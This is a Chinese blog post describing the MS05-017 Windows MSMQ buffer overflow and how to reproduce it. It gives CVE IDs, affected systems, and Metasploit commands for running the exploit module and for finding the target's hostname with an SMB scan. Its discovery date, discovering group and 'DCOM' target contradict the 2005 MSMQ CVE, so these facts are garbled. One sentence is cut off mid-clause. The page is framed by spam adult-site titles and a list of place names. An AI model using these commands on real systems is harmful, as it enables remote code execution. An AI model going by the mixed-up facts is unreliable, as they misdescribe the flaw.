中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

ms05-017漏洞原理與復現

發布時間:2020-05-26 20:17:18 來源:網絡 閱讀:1520 作者:Owefsad 欄目:安全技術
漏洞描述
此漏洞由lds-pl.net漏洞研究組在2003年7月16日發現,漏洞及exp在網上公開后,網上出現了大量的×××實例,利用此漏洞的蠕蟲也大量出現。
漏洞編號
CVE-2005-0059
OSVDB-15458
MSB-MS05-017
BID-13112
×××目標
DCOM接口的服務器
影響系統
    Microsoft Windows XP Service Pack 1
    Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
    Microsoft Windows 2000 Service Pack 4
    Microsoft Windows 2000 Service Pack 3
    Microsoft Windows 98 Second Edition (SE) 
    Microsoft Windows 98
漏洞原理
msmq在將輸入的字符串傳遞到緩沖區之前沒有執行正確的驗證,因此,可通過傳遞特制的msmq消息來觸發漏洞造成緩沖區溢出漏洞。漏洞可導致遠程代碼執行、本地提權。由于msmq
概念解釋
1. msmq( MicroSoft Message Queuing, 微軟消息隊列)是在多個不同的應用之間實現互相通信的一種異步消息傳輸模式,互相通信的應用可以位于同一臺機器上,也可以分布于網絡空間中的任意位置。msmq實現原理:消息的發送者將想要發送的消息發送至一個message中,然后保存至一個系統公共空間的消息隊列(Message Queuing)中,需要接受message的應用從Message Queuing中取出Message進行處理。msmq在消息傳遞時,需要借助hostname來通信。
metasploit exp可用目標
Windows 2000 ALL 
Windows XP SP0-SP1 (English)
metasploit利用ms05-017

利用此payload需要netbios hostname、ip、port三項內容

use exploit/windows/dcerpc/ms05_017_msmq
set hname <target hostname>
set rhost <target ip>
set rport <target port>
run -j

msf中查看hname

use scanner/smb/smb_version
set rhost <target ip>
set threads 24
run
不使用metasploit情況下利用ms05-017
暫未發現,后續補充
參考文章
  1. MS05-017 Microsoft Message Queueing Service Path Overflow
  2. Virus Encyclopedia
  3. MSMQ
向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

乌拉特中旗| 义马市| 龙南县| 宜城市| 邛崃市| 三门峡市| 霸州市| 同仁县| 义马市| 平陆县| 大埔县| 清河县| 浮梁县| 游戏| 浦城县| 潮安县| 腾冲县| 财经| 吉木萨尔县| 沂南县| 佛山市| 安龙县| 特克斯县| 卓资县| 磴口县| 南投市| 大厂| 监利县| 杭锦后旗| 顺平县| 自治县| 阳曲县| 长宁县| 安图县| 荔波县| 山阴县| 砚山县| 辽宁省| 恩施市| 措美县| 肥乡县|